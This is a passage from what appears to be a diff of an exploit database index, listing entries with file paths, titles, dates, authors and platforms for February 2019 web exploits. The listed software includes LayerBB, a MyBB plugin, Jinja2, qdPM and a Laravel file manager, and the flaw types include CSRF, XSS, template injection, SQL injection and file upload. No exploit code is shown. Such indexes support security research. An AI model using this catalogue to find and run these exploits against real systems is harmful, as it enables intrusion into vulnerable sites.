Injection",2019-02-14,B0UG,webapps,php,80 46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80 +46384,exploits/php/webapps/46384.txt,"MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2019-02-15,0xB9,webapps,php,80 +46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python, +46387,exploits/php/webapps/46387.txt,"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection",2019-02-15,"Mehmet EMIROGLU",webapps,php,80 +46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80